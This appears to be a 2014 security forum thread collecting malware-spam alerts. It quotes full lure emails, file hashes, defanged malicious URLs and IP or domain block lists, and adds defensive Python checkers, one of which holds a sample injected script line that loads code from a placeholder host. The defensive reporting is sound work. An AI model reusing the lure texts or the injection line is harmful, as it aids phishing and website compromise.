- https://malwr.com/analysis/ZTNjMzM4Y2Y0NDFkNDQzZTgwZWE0ZGUyNmJjOTEyZDg/

- https://www.virustotal.com/en-gb/ip-address/206.190.147.142/information/

- https://www.virustotal.com/en-gb/ip-address/95.101.0.115/information/
___

Fake Quickbooks Invoice - Trojan.Zbot ...
- http://blog.mxlab.eu/2014/01/14/trojan-zbot-ide-attached-to-different-emails-quickbooks-invoice-important-docs/
Jan 14, 2014 - "... intercepting different types of emails with an attached Trojan.Zbot.IDE.
> Quickbooks Invoice: This email is sent from the spoofed address “QuickBooks Invoice <auto-invoice@ quickbooks .com>” while the SMTP from is “fraud@ aexp .com”, has the subject “Notification of direct debit of fees” and has the following body:
Notification Number: 5430143
Mandate Number: 8396466
###THIS IS AN AUTO NOTIFICATION EMAIL. DO NOT REPLY TO THE SENDER OF THIS EMAIL. IF YOU HAVE A QUERY PLEASE REFER TO THE INFORMATION BELOW ###
This is notification that Land Registry will debit 214.00 GBP from your nominated account on or as soon as possible before 15/01/2013.
Details of fees that we shall be collecting by direct debit for the applications charged are now available to view.
You can access these by opening attached report.
If you have an enquiry relating to your VDD account please contact Customer Support at customersupport@ landregistry .gsi .gov .uk or call on 0844 892 1111. For all enquiries, please quote your key number.
Thank you,
Land Registry ...
The attached ZIP file has the name Notification_5430143.zip and contains the 19 kB large file Notification_1401.exe.
> Important Docs: This email is sent from the spoofed address “Elbert Hickman <xxxx@ rbs .co .uk>” while the SMTP from is “fraud@aexp .com”, has the subject “Important Docs” and has the following body:
Check attached docs.
Elbert Hickman
Commercial Banking Support
Thames Gateway Commercial Office
2nd Floor, Riverbridge House, Anchor Boulevard,
Crossways, Dartford, Kent DA2 6SL
Depot Code 023
Tel: 01322 639620
Fax: 01322 606862
email: Elbert@ rbs .co .uk ...
The attached ZIP file has the name Docs_14012014.zip and contains the 19 kB large file Docs_14012014.exe. The trojan is known as Trojan.Zbot.IDE, Trojan-Spy.Zbot, TR/Yarwi.B.117, W32/Trojan.TROM-4807 or Trojan.Email.FakeDoc. At the time of writing, 14 of the 48 AV engines did detect the trojan at Virus Total*."
* https://www.virustotal.com/en/file/2bd962a5552826c2b24447a8bcbce7d7f08c0c863cb041d70f851771a77a6ef5/analysis/1389713323/

- https://malwr.com/analysis/ZjM0MmVjY2QwOWY5NGU2MTlhNTBiNTBjYzE5OTY5ZmI/

- https://www.virustotal.com/en-gb/ip-address/85.204.19.17/information/

- https://www.virustotal.com/en-gb/ip-address/95.101.0.104/information/
___

Fake PG&E SPAM
- http://blog.dynamoo.com/2014/01/pg-gas-and-electric-usage-statement-spam.html
14 Jan 2014 - "This -fake- spam from the Pacific Gas & Electric company is presumably meant to have a malicious payload, but all I get is a server error...
From: PG&E [do_not_reply@ sourcefort .com]
Reply-To: PG&E [do_not_reply@ sourcefort .com]
Date: 14 January 2014 22:37
Subject: Gas and Electric Usage Statement
PG & E ENERGY STATEMENT Account No: 718198305-5
Statement Date: 01/10/2014
Due Date: 02/01/2014
Your Account Summary
Amount Due on Previous Statement $344.70
Payment(s) Recieved Since Last Statement 0.0
Previous Unpaid Balance $344.70
Current Electric Charges $165.80
Current Gas Charges 49.20
Total Amount Due BY 02/01/2014 $559.7
To view your most recent statement, please click here You must log-in to your account or register for an online account to view your statement...

Screenshot: http://2.bp.blogspot.com/-AhQr4bPPcjA/UtW8y45D6fI/AAAAAAAACZw/EPN9GQZd8nA/s1600/pge.png

To give PG&E full credit, they have a link on their homepage about it and a full warning here*. These scam emails seem to have been doing the rounds for quite a few days now."
* http://www.pgecurrents.com/2014/01/08/pge-warns-of-scam-emails-calls/

:mad: :mad:

AplusWebMaster
2014-01-15, 18:00
FYI...

Fake Staples order SPAM...
- http://blog.dynamoo.com/2014/01/staples-your-order-is-awaiting.html
15 Jan 2014 - "This -fake- Staples spam has a malicious attachment:
Date: Wed, 15 Jan 2014 15:40:44 +0800 [02:40:44 EST]
From: Staples Advantage Orders [Order@ staplesadvantage .com]
Subject: Your order is awaiting verification!
Order Status: Awaiting verification
Order #: 5079728
Your order has been submitted and is awaiting verification from you.
Order #: 5079728
Order Date and Eastern Time: 2/19/2013 12:28 PM
Order Total: $152.46
This is potentially due to missing or invalid order or payment information. If you receive this status message, please call Customer Service immediately for assistance....

Screenshot: https://lh3.ggpht.com/--iaCgzY9eyg/UtanjFKqkSI/AAAAAAAACaA/W4MGugL9yLU/s1600/staples2.png

Attached is a ZIP file Order_5079728.zip which in turn contains a malicious executable Order_{_partorderb}.exe which has a VirusTotal detection rate of 23/47*. The Malwr report is pretty inconclusive, so presumably the binary is hardened against automated analysis tools."
* https://www.virustotal.com/en-gb/file/351499a61b3c987967fa2754a1726e4fc4d2ea3dddb352552584cbb10e74f8a1/analysis/1389799070/

- http://threattrack.tumblr.com/post/73414944865/staples-order-verification-spam
Jan 15, 2014 - "Subjects Seen:
Your order is awaiting verification!
Typical e-mail details:
Your order has been submitted and is awaiting verification from you.
Order #: 1178687
Order Date and Eastern Time: 2/19/2013 12:28 PM
Order Total: $271.74
This is potentially due to missing or invalid order or payment information. If you receive this status message, please call Customer Service immediately for assistance...

Malicious File Name and MD5:
Order_1178687.zip (312C682B547215FB1462C7C46646A1B7)
Order_{_partorderb}.exe (1D85D2CC51AC6E1A2805366BB910EF70)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/b3864d35e3fb5fe5d4789b184d92c16f/tumblr_inline_mzg9f3cJYM1r6pupn.png

Tagged: Staples, Upatre
___

Fake RBS pwd reset SPAM – PDF malware
- http://myonlinesecurity.co.uk/rbs-bankline-password-reset-form-fake-pdf-malware/
15 Jan 2014 - "... another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. Of course the RBS Bankline Password Reset Form is not from RBS or any other bank. Once the scammers and malware purveyors find a new or different scam they will use every bank they can to try to infect as many users as they can. Normally when you see an attachment or email with a subject like RBS Bankline Password Reset Form, you automatically think that it is another phishing attempt. In this case it is not phishing but a very nasty malware/virus/trojan. Almost all of these have a password stealing component, with the aim of stealing your email or FTP (web space) login credentials. Many of them are also designed to specifically steal your Facebook and other social network login details.
Please find the Re-activation form attached, send one per user ensuring only one box is selected in section 3. A signatory on the bank mandate must sign the form. Fax to 0845 878 9791 or alternatively email a scanned copy of the form to banklineadministration@ rbs .co .uk, on receipt of the completed form we will respond to the request within 2 working hours and communicate this to the user by email. <<RBS_Bankline_Password_Reactivation.pdf>> Please note – The life-span of an activation code is 21 days; after this time, the activation code will expire and a new one must be ordered. Please be aware when choosing a new pin and password for the service, it is important not to use pin/passwords that you have used before but to use completely different details. If you are the sole Administrator may I take this opportunity to suggest when you are reinstated on the system, to set up another User in an Administrator role. This will prevent you being locked out completely and allow you to order a new activation code from within the system and reset your security sooner. If you require any further assistance then please do not hesitate to contact us...
Regards
Bankline Product Support ...

RBS_Bankline_Password_Reactivation.zip extracts to RBS_Bankline_Password_Reactivation.exe. Current Virus total detections: 2/48*. MALWR Auto Analysis**... This is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected. All of these emails use social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend, or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Be very careful when unzipping them and make sure you have “show known file extensions” enabled, and then look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened."
* https://www.virustotal.com/en/file/e9f2c240795640b17f43c0ef322d483a86e023146889c06a9f81fe1b3b0d3e0c/analysis/

** https://malwr.com/analysis/YmYyYjIzMGM2N2I3NGJmZjhhMDlkMmFjMTE5MTA1NGM/

38.102.226.94
- https://www.virustotal.com/en-gb/ip-address/38.102.226.94/information/

- http://google.com/safebrowsing/diagnostic?site=AS:174
___

Compromised Sites pull Fake Flash Player from SkyDrive
- http://www.f-secure.com/weblog/archives/00002659.html
Jan 15, 2014 - "On most days, our WorldMap* shows more of the same thing. Today is an exception... One infection is topping so high in the charts that it pretty much captured our attention. Checking the recent history of this threat, we saw that these past few days, it has been increasing in infection hits... It wasn't long before we saw that a lot of scripts hosted in various websites got compromised. Our telemetry actually showed that almost 40% of the infected websites were hosted in Germany. In those sites, malicious code has been appended to the scripts... Successful redirection leads to a fake flash download site that looks similar to these pages:
> http://www.f-secure.com/weblog/archives/5_flash1.PNG
... The user would have to manually click on the Download Now link before a file called flashplayer.exe could be downloaded from a certain SkyDrive account. When the malicious flashplayer.exe is executed, this message is displayed to the user.
> http://www.f-secure.com/weblog/archives/7_dialog.PNG
While in the background, it is once again connecting to the same SkyDrive account in order to download another malware... Initial analysis showed that the sample is connecting to these locations.
> http://www.f-secure.com/weblog/archives/9_post.PNG ..."

* http://worldmap3.f-secure.com/

- https://www.virustotal.com/en-gb/ip-address/208.73.210.155/information/

- https://www.virustotal.com/en-gb/ip-address/151.236.24.49/information/

:sad: :fear: :mad:
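
The RBS post above makes the practical point: a zipped .exe carrying a PDF icon passes for a document once Windows hides known extensions. The following Python is an added example (not the blog's or the forum poster's code) of how a mail gateway or help desk script can inspect a ZIP attachment's members before anyone unzips it: it flags executable extensions, document-then-executable double extensions, and members that carry a Windows PE "MZ" header under a document or picture name. The archive it inspects is constructed in memory; the member names echo those reported in the posts above, the contents are inert placeholders.

```python
import io
import zipfile

# Extensions Windows runs directly. With "show known file extensions" off,
# Explorer displays Invoice.pdf.exe as Invoice.pdf, the trick described above.
EXECUTABLE_EXTS = {"exe", "scr", "pif", "com", "bat", "cmd", "js", "jse",
                   "vbs", "vbe", "wsf", "hta", "cpl"}
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}


def classify_member(name: str, head: bytes) -> list:
    """Return the reasons a ZIP member looks like a disguised executable (empty if none).

    name is the member's path inside the archive; head is its first few bytes.
    """
    base = name.rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    reasons = []
    if ext in EXECUTABLE_EXTS:
        reasons.append("executable extension ." + ext)
    # Invoice.pdf.exe: a document extension sits right before the real one.
    if len(parts) >= 3 and parts[-2] in DOCUMENT_EXTS and ext in EXECUTABLE_EXTS:
        reasons.append("double extension disguised as ." + parts[-2])
    # A Windows PE image starts with the DOS "MZ" signature whatever it is named.
    if head.startswith(b"MZ") and ext not in EXECUTABLE_EXTS:
        reasons.append("PE header (MZ) under non-executable name")
    return reasons


def inspect_attachment(zip_bytes: bytes) -> list:
    """Open a ZIP attachment in memory and list (member name, reasons) for suspicious members."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(4)  # only the signature is needed, never run the member
            reasons = classify_member(info.filename, head)
            if reasons:
                findings.append((info.filename, reasons))
    return findings


def build_sample_archive() -> bytes:
    """Constructed test archive: names echo the posts above, contents are inert placeholders."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("statement.pdf", b"%PDF-1.4\n% constructed placeholder, no content\n")
        zf.writestr("RBS_Bankline_Password_Reactivation.exe", b"MZ" + b"\x00" * 62)
        zf.writestr("Invoice_ADP_01142014.pdf.exe", b"MZ" + b"\x00" * 62)
        zf.writestr("IMG9900882.jpg", b"MZ" + b"\x00" * 62)
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in inspect_attachment(build_sample_archive()):
        print(f"{name}: {'; '.join(reasons)}")
```

The signature check matters more than the name check: renaming the member does not change its first two bytes, so a PE file named IMG9900882.jpg is still caught, while a genuine PDF is left alone.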

AplusWebMaster
2014-01-16, 15:56
FYI...

Cushion Redirect sites using hijacked GoDaddy domains to block
- http://blog.dynamoo.com/2014/01/cushion-redirect-sites-using-hijacked.html
16 Jan 2014 - "... some suspect activity on 194.28.175.129 (BESTHOSTING-AS ON-LINE Ltd, Ukraine) which appears to be hosting some Cushion Redirect domains (explained here*) which are being injected into certain sites such as the one in this URLquery report**... A brief examination of the server shows several subdomains of hijacked GoDaddy domains being used for malicious redirects... The hijacked GoDaddy domains in question are:
allgaysitespassfree .com
amateurloginfree .com
yourchicagocarservice .com
yourchicagogranite .com
yourchicagohummerlimo .com
yourbestpartybus .com
A quick look at the Google stats for AS42655*** indicates to me personally that blocking 194.28.172.0/22 might be a prudent idea if you don't have any reason to send traffic to Ukrainian sites."
* http://malwaremustdie.blogspot.com/2013/09/302-redirector-new-cushion-attempt-to.html

** http://urlquery.net/report.php?id=8838865

- https://www.virustotal.com/en-gb/ip-address/194.28.175.129/information/

*** http://www.google.com/safebrowsing/diagnostic?site=AS:42655
___

Script exploits lead to Adscend Media LLC ads
- http://blog.dynamoo.com/2014/01/script-exploits-lead-to-adscend-media.html
16 Jan 2014 - "Over the past few days I have seen several cases where legitimate websites have had .js files interfered with in order to serve up something malicious. Here is a case in point.. the German website physiomedicor .de has been hacked to serve up a fake Flash download, as can be seen from this URLquery report*. In this case it's pretty easy to tell what's going on from the URLquery screenshot:
> http://3.bp.blogspot.com/-BqNzhIdeK1Y/Utfer7qFwFI/AAAAAAAACa0/gHJVqXmtrVk/s1600/urlquery.jpg
What has happened is that somehow an attacker has altered several .js files on the victim's site and has appended extra code. In this case the code has been appended to [donotclick]www.physiomedicor .de/assets/rollover.js as follows...
> http://4.bp.blogspot.com/-Gb14LMV3niM/UtfgX5HhfII/AAAAAAAACbA/Kg04ljNJmF0/s1600/injection1.png
In this case the code injected tries to load a script from a hijacked site [donotclick]ghionmedia .com/PROjes/goar2RAn.php?id=56356336 but this isn't the first time that I've seen this format of URL injected into a script today as I've seen these other two (also using hijacked sites) as well:
[donotclick]berriesarsuiz .com/ptc84vRb.php?id=117515949
[donotclick]www.karsons .co .uk/qdrX3tDB.php?id=114433444
... Adscend Media has been accused of deceptive advertising practices** before which makes me think that it might be a good candidate for -blocking- on your network, especially as they have private WHOIS details for that domain. If you want to banish these from your network then the following list might help:
199.59.164.5
adscendmedia .com
adshiftclick .com
jmp2 .am
lnkgt .com ..."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=8840002

** http://news.cnet.com/8301-1023_3-57429518-93/alleged-facebook-likejacker-settles-with-washington-state/

81.169.145.150
- https://www.virustotal.com/en-gb/ip-address/81.169.145.150/information/
___

Fake malicious "ACTION REQUIRED" SPAM
- http://blog.dynamoo.com/2014/01/action-required-document-has-arrived.html
16 Jan 2014 - "This spam with a lengthy subject has a malicious attachment:
Date: Thu, 16 Jan 2014 09:39:28 -0600 [10:39:28 EST]
From: "support@salesforce .com" [support@salesforce .com]
Subject: ACTION REQUIRED: A document has arrived for your review/approval (Document Flow Manager)
Priority: High Priority 2
This message is for the designated recipient only and may contain privileged, proprietary, or otherwise private information. If you have received it in error, please notify the sender immediately and delete the original. Any other use of the email by you is prohibited.
Record ID: HJRQY9PSXBSK334
Supplier: http ://[victimdomain .com]
Invoice No.: 5644366804
Document No.: 3319683775
Invoice amount: USD 0488.21
Rejection reason(s): Approval Required
Please find enclosed a record of invoice that could not be processed. We would like to ask you to assist us in resolving the noted rejection reasons.

Attached is a file SFHJRQY9PSXBSK334.zip which in turn contains a malicious executable SF.EXE which has an icon that makes it look like a PDF file. This file has a very low detection rate at VirusTotal of 2/48*... analysis shows an attempted connection to centrum .co .id on 75.98.233.44 (Ceranet, US). This is the only site on that server, blocking either the IP or domain might be useful."
* https://www.virustotal.com/en-gb/file/b0d91090761192733241b1825a120ed7c984c3a43ef4cd16cacbeabc4426ebf9/analysis/1389889350/

- http://threattrack.tumblr.com/post/73524218077/salesforce-com-malicious-spam
Jan 16, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/bfdcf1b6d905c870af58d2bbb29410dc/tumblr_inline_mzi8n1JQ3n1r6pupn.png
Tagged: Salesforce, Upatre
___

Google+ Local - Thousands Of Hotel Listings Hijacked
- http://searchengineland.com/thousands-of-hotels-listings-were-hijacked-in-google-local-181670
Jan 14, 2014 - "Thousands of hotels listed within Google+ Local appear to have had links leading to their official sites “hijacked” and replaced with ones leading to third-party booking services. Google+ Local listings are what Google depends on to provide results in Google Maps or Google Search, when people look for local businesses... Doing a search on Google for Google+ Local listings using these domains reveals how thousands of hotels appear to have been hit. For example, a search for listings using the “RoomsToBook .Info” domain currently brings up 1,880 listings that appear to have been hijacked:
> http://searchengineland.com/figz/wp-content/seloads/2014/01/site_plus_google_com__roomstobook_info__-_Google_Search-4-600x816.jpg
Postscript: Google has now said that I can confirm it is aware of the issue and is working to fix it."

- http://searchengineland.com/local-seos-sound-off-on-google-local-hijackings-181933
Jan 16, 2014 - "... Without offering any substantive comments about the situation Google appears to have cleaned up the problem and mostly if not entirely restored the proper links. There’s been no explanation forthcoming about how this might have happened from the company, though Google acknowledged the incident..."

:fear::fear: :mad:
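
Both the F-Secure item in the previous post and the dynamoo "Script exploits" item above describe the same site-side symptom: legitimate .js files that had malicious code appended to their end. An added example (not the blogs' or the forum poster's code) of the defensive check a site owner can run: keep a baseline of (sha256, size) for each shipped script, then compare live copies against it. Because the attackers append rather than rewrite, the original bytes are still a prefix of the tampered file, so the audit can tell a pure append apart from other modifications and return the appended tail for inspection. The scripts, paths and the injected tail below are constructed; the hostname in the tail is a placeholder.

```python
import hashlib
from pathlib import Path


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_baseline(files: dict) -> dict:
    """Map each asset path to (sha256, size) taken from a known-good copy."""
    return {path: (sha256(data), len(data)) for path, data in files.items()}


def snapshot_dir(root: str, pattern: str = "*.js") -> dict:
    """Read every matching file under root into {relative posix path: bytes} (live use)."""
    base = Path(root)
    return {p.relative_to(base).as_posix(): p.read_bytes()
            for p in base.rglob(pattern) if p.is_file()}


def audit_assets(baseline: dict, current: dict) -> dict:
    """Compare live files against the baseline.

    Returns {path: (status, tail)} for anything that changed. status is
    'appended' (original bytes intact, extra bytes after them; tail holds the
    extra bytes), 'modified', 'missing' or 'new'. Unchanged files are omitted.
    """
    report = {}
    for path, (digest, size) in baseline.items():
        data = current.get(path)
        if data is None:
            report[path] = ("missing", b"")
        elif sha256(data) == digest:
            continue
        elif len(data) > size and sha256(data[:size]) == digest:
            report[path] = ("appended", data[size:])
        else:
            report[path] = ("modified", b"")
    for path in current:
        if path not in baseline:
            report[path] = ("new", b"")
    return report


# Constructed sample: a small rollover script as shipped, and the tail an
# attacker might append to pull a second script from elsewhere (placeholder host).
ORIGINAL_JS = b"function swap(img, src) { img.src = src; }\n"
INJECTED_TAIL = (b"/* constructed injected tail */\n"
                 b"var s=document.createElement('script');"
                 b"s.src='http://hijacked-site.invalid/x.php?id=0';"
                 b"document.head.appendChild(s);\n")


def demo() -> dict:
    """Run the audit over constructed baseline and live trees."""
    known_good = {"assets/rollover.js": ORIGINAL_JS,
                  "assets/menu.js": b"var menu = {};\n"}
    baseline = build_baseline(known_good)
    live = {"assets/rollover.js": ORIGINAL_JS + INJECTED_TAIL,   # tampered
            "assets/menu.js": b"var menu = {};\n",              # untouched
            "assets/extra.js": b"// constructed: not in baseline\n"}
    return audit_assets(baseline, live)


if __name__ == "__main__":
    for path, (status, tail) in demo().items():
        print(path, status, tail.decode(errors="replace"))
```

In live use, build the baseline from the deployment artifact (not from the web root after the fact) and run `audit_assets(baseline, snapshot_dir("/var/www/site"))` on a schedule; an "appended" result whose tail references a script on another host is exactly the case the two posts describe.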

AplusWebMaster
2014-01-17, 18:53
FYI...

Fake Experian Credit Report Malicious Spam
- http://threattrack.tumblr.com/post/73615136871/experian-credit-report-malicious-spam
Jan 17, 2014 - "Subjects Seen:
IMPORTANT - A Key Change Has Been Posted
Typical e-mail details:
A key change has been posted to one of your three national Credit Reports. Each day we monitor your Experian®, Equifax and TransUnion Credit Reports for key changes that may help you detect potential credit fraud or identity theft. Even if you know what caused your Report to change, you don’t know how it will affect your credit, so we urge you to do the following:
View detailed report by opening the attachment.
You will be prompted to open (view) the file or save (download) it to your computer.
For best results, save the file first, then open it in a Web browser.
Contact our Customer Care Center with any additional questions.
Note: The attached file contains personal data.

Malicious File Name and MD5:
Credit_Report_4287362163.zip (1B1C6223EC52CE2E2B8CE6C117A15ADA)
Credit_Report_4287362163.exe (B4101936ED3C8BC09F994223A39E5FE2)

Screenshot: https://31.media.tumblr.com/5f9f8502e65a25465c35c879ef89f06a/tumblr_inline_mzjvs68VC01r6pupn.png

Tagged: Experian, Upatre
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Photograph Sharing Email Messages - 2014 Jan 17
Fake Court Notice Email Messages - 2014 Jan 17
Fake Fax Message Receipt Email Messages - 2014 Jan 17
Fake Credit Report Email Messages - 2014 Jan 17
Fake Fax Message Delivery Email Messages - 2014 Jan 17
Fake Job Offer Notification Email Messages - 2014 Jan 17
Fake Account Payment Information Email Messages - 2014 Jan 17
Fake Failed Delivery Notification Email Messages - 2014 Jan 17
Fake Fax Message Delivery Email Messages - 2014 Jan 17
Fake Incoming Money Transfer Notification Email Messages - 2014 Jan 17
Fake Invoice Statement Attachment Email Messages - 2014 Jan 17
Fake Delivery Express Parcel Notification Email Messages - 2014 Jan 17
Fake Anti-Phishing Email Messages - 2014 Jan 17
Malicious Personal Pictures Attachment Email Messages - 2014 Jan 17
Fake Product Order Notification Email Messages - 2014 Jan 17
(More detail and links at the cisco URL above.)

:fear::mad: :sad:

AplusWebMaster
2014-01-20, 14:38
FYI...

Spyware attacks against U.S. bloggers ...
- http://www.welivesecurity.com/2014/01/20/vietnamese-malware-single-post-enough-to-trigger-spyware-attacks-against-u-s-bloggers-eff-claims/
20 Jan 2014 - "A single anti-government blog post is enough to trigger personalized spyware attacks from hacker groups supporting the Vietnamese communist state, which the Electronic Frontier Foundation claims* targets anti-government bloggers – even those in other countries – with malware, including its staff, and Californian activists... The new campaign, though, used highly targeted attacks aimed at specific critics of the government – including EFF staff... The -malware- was sent out as a link to a Google document, and was sent in emails tailored to targets – the activists were invited to a conference, and an Associated Press journalist was offered a white paper from Human Rights Watch..."
* https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal
Jan 19, 2014

- https://net-security.org/malware_news.php?id=2679
20.01.2014
___

PG&E SPAM - Malware distribution campaign
- https://isc.sans.edu/diary.html?storyid=17459
Last Updated: 2014-01-19 18:41:43 UTC - "Starting about 10 days or so ago, a Spam campaign began targeting Pacific Gas and Energy (PG&E), a large U.S. energy provider. PG&E has been aware of this campaign for about a week, and has informed its customers.
> http://www.pgecurrents.com/2014/01/08/pge-warns-of-scam-emails-calls/
... these emails look quite professional and the English is good. The only real issue in the email being formatting of some of the currency figures.
> https://isc.sans.edu/diaryimages/images/PGEStatement.jpg
The header revealed that it was sent from user nf@ www1 .nsalt .net using IP 212.2.230.181, most likely a compromised webmail account. Both the from and the reply-to fields are set to do_not_reply@ nf .kg, an email address that bounces. The 212.2.230.181 IP, the nf .kg domain and the nsalt .net domain - all map to City Telecom Broadband in Kyrgyzstan (country code KG)... the goal of this particular campaign seems to be malware distribution. The "click here" link in the two samples points to different places:
hxxp ://s-dream1 .com/message/e2y+KAkbElUyJZk38F2gvCp7boiEKa2PSdYRj+YOvLI=/pge
hxxp ://paskamp .nl/message/hbu8N3ny7oAVfvBZrZWLSrkYv2kTbwArk3+Tspbd2Cg=/pge
Both of these links are now down, but when they were alive they both served up PGE_FullStatement_San_Francisco_94118.zip which contained a Windows executable... Virustotal has a 5/48 detection rate indicating this is most likely a Trojan Dropper:
> https://isc.sans.edu/diaryimages/images/virustotalpge.jpg ..."

- https://www.virustotal.com/en/ip-address/212.2.230.181/information/
___

Spammers buy Chrome extensions - turn them into adware
- https://www.computerworld.com/s/article/9245551/Spammers_buy_Chrome_extensions_and_turn_them_into_adware
Jan 20, 2014 - "... At least two Chrome extensions recently sold by their original developers were updated to inject ads and affiliate links into legitimate websites opened in users' browsers. The issue first came to light last week when the developer of the "Add to Feedly" extension, a technology blogger named Amit Agarwal, reported that after selling his extension late last year to a third-party, it got transformed into adware... A second developer, Roman Skabichevsky, confirmed Monday that his Chrome extension called "Tweet This Page" suffered a similar fate after he sold it at the end of November... According to the Chrome Web Store developer program policies, advertising is allowed in apps hosted in the store, but there are strict criteria for displaying ads on third-party websites..."
___

Bill Me Later Payment Spam
- http://threattrack.tumblr.com/post/73952603900/bill-me-later-payment-spam
Jan 20, 2014 - "Subjects Seen:
Thank you for scheduling a payment to Bill Me Later
Typical e-mail details:
Dear Customer,
Thank you for making a payment online! We’ve received your
Bill Me Later® payment of $1201.39 and have applied it to your account.
For more details please check attached file
Summary:
Your Bill Me Later Account Number Ending in: 0759
You Paid: $1201.39
Your Payment Date*: 01/20/2014
Your Payment Confirmation Number: 042075773771348058

Malicious File Name and MD5:
PP_03357442.zip (93C0326C3D37927E4C38C90016C7F14C)
PP_03357442.exe (2B68D8CC7CB979EA9A1405D32E30A00A)

Screenshot: https://31.media.tumblr.com/dcb80e6f244cf5c9ac9a1b1f619ca78c/tumblr_inline_mzpik5AQ2R1r6pupn.png

Tagged: bill me later, Upatre

- http://blog.dynamoo.com/2014/01/thank-you-for-scheduling-payment-to.html
20 Jan 2014 - "This -fake- Bill Me Later spam has a malicious attachment:
Date: Mon, 20 Jan 2014 14:23:08 +0000 [09:23:08 EST]
From: Bill Me Later [service@ paypal .com]
Subject: Thank you for scheduling a payment to Bill Me Later
BillMeLater
Log in here
Your Bill Me Later statement is now available!
Dear Customer,
Thank you for making a payment online! We've received your
Bill Me Later® payment of $1603.57 and have applied it to your account.
For more details please check attached file
Summary:
Your Bill Me Later Account Number Ending in: 0266
You Paid: $1603.57
Your Payment Date*: 01/20/2014
Your Payment Confirmation Number: 971892583971968191 ...

Screenshot: https://lh3.ggpht.com/-g4CABaa5Ka4/Ut1QywUpoEI/AAAAAAAACbY/NXzEDLx1S_U/s1600/billmelater.png

Attached is an archive file PP_03357442.zip which in turn contains a malicious executable PP_03357442.exe which has a VirusTotal detection rate of just 4/45*. Automated analysis tools... show an attempted connection to jatit .org on 72.9.158.240 (Colo4, US) which appears to be a legitimate (but presumably compromised) site."
* https://www.virustotal.com/en-gb/file/e6407a8ddd930055870379962e430154381a909e15e5af84d2da53ee3d8b2106/analysis/1390235463/
___

Fake WhatsApp "A friend of yours has just sent you a pic" SPAM
- http://blog.dynamoo.com/2014/01/whatsapp-friend-of-yours-has-just-sent.html
20 Jan 2014 - "This -fake- WhatsApp spam has a malicious attachment:
Date: Mon, 20 Jan 2014 06:23:28 -0500 [06:23:28 EST]
From: WhatsApp [{messages@ whatsapp .com}]
Subject: A friend of yours has just sent you a pic
Hey!
Someone you know has just sent you a pic in WhatsApp. Open attachments to see what it is.
2013 WhatsApp Inc

Screenshot: https://lh3.ggpht.com/-ogFWbF6oOwk/Ut1zdrTph5I/AAAAAAAACbo/gYz18kkrW_A/s1600/whatsapp.png

Attached to the message is an archive file IMG9900882.zip which in turn contains a malicious executable IMG9900882.exe which has a VirusTotal detection rate of 20/49*... analysis gives few clues as to what the malware does, other automated analysis tools are inconclusive."
* https://www.virustotal.com/en/file/a1142f44e5add86007cf1be62d909e19032a165c57d29a61c10af009d0fcf69f/analysis/1390244298/

:mad: :fear:
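
The mxlab items in the 2014-01-14 post keep noting a spoofed From address while "the SMTP from is fraud@ aexp .com", and the SANS diary above compares the From, Reply-To and sending host of the PG&E mail. That comparison is scriptable. The following is an added example (not the blogs' or the forum poster's code) that parses a raw message with Python's standard email library and reports when the envelope sender recorded in Return-Path, or the Reply-To address, belongs to a different domain than the From header. The two messages are constructed and use placeholder .example domains rather than the real ones named in the posts.

```python
from email import message_from_bytes
from email.policy import default
from email.utils import parseaddr


def addr_domain(value) -> str:
    """Lower-cased domain of the first address in a header value ('' if none)."""
    if not value:
        return ""
    _, addr = parseaddr(str(value))
    return addr.rpartition("@")[2].lower()


def sender_mismatches(raw: bytes) -> list:
    """Flag a message whose envelope sender or Reply-To does not match its From domain.

    Return-Path is the SMTP envelope sender as recorded by the receiving MTA;
    the spoofed runs above show a branded From with an unrelated envelope sender.
    """
    msg = message_from_bytes(raw, policy=default)
    from_dom = addr_domain(msg.get("From"))
    reasons = []
    rp_dom = addr_domain(msg.get("Return-Path"))
    if rp_dom and rp_dom != from_dom:
        reasons.append(f"envelope sender domain {rp_dom} != From domain {from_dom}")
    reply_dom = addr_domain(msg.get("Reply-To"))
    if reply_dom and reply_dom != from_dom:
        reasons.append(f"Reply-To domain {reply_dom} != From domain {from_dom}")
    return reasons


# Constructed sample messages; all domains are placeholders.
SPOOFED = b"""Return-Path: <fraud@card-issuer.example>
From: "QuickBooks Invoice" <auto-invoice@accounting-vendor.example>
Reply-To: do_not_reply@mailer.example
Subject: Notification of direct debit of fees

Details of fees are in the attached report.
"""

LEGIT = b"""Return-Path: <bounces@shop.example>
From: "Shop Orders" <orders@shop.example>
Subject: Your order has shipped

Thanks for your order.
"""

if __name__ == "__main__":
    print(sender_mismatches(SPOOFED))
    print(sender_mismatches(LEGIT))
```

This check only reads headers the receiving server already adds, so it costs nothing to run at the gateway; a mismatch is not proof of spoofing (mailing-list and bulk senders legitimately differ), but combined with an executable-in-ZIP attachment like those above it is a strong reason to quarantine.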

AplusWebMaster
2014-01-21, 15:53
FYI...

Fake Apple Account 'Update to New SSL Servers' Phishing Scam/SPAM
- http://www.hoax-slayer.com/apple-new-ssl-servers-phishing-scam.shtml
